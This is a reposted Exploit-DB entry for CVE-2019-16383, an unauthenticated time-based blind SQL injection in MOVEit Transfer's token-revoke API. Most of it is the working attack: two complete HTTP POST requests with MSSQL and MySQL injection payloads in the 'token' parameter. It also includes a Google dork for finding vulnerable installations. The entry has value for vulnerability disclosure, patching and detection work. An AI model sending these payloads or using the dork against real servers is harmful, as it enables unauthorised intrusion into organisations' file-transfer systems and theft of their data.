MOVEit Transfer 11.1.1 – ‘token’ Unauthenticated SQL Injection

• Exploit Database
• 14 阅读

• 作者： Aviv Beniash
  日期： 2020-04-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48316/

• # Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection 
  # Google Dork: inurl:human.aspx intext:moveit
  # Date: 2020-04-12
  # Exploit Authors: Aviv Beniash, Noam Moshe
  # Vendor Homepage: https://www.ipswitch.com/
  # Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
  # CVE : CVE-2019-16383
  # 
  # Related Resources:
  # https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
  # https://nvd.nist.gov/vuln/detail/CVE-2019-16383
  
  # Description:
  # The API call for revoking logon tokens is vulnerable to a
  # Time based blind SQL injection via the 'token' parameter
  
  # MSSQL payload:
  
  POST /api/v1/token/revoke HTTP/1.1
  Host: moveittransferstg
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 32
  
  token='; WAITFOR DELAY '0:0:10'--
  
  
  # MySQL payload:
  
  POST /api/v1/token/revoke HTTP/1.1
  Host: moveittransferstg
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 21
  
  token=' OR SLEEP(10);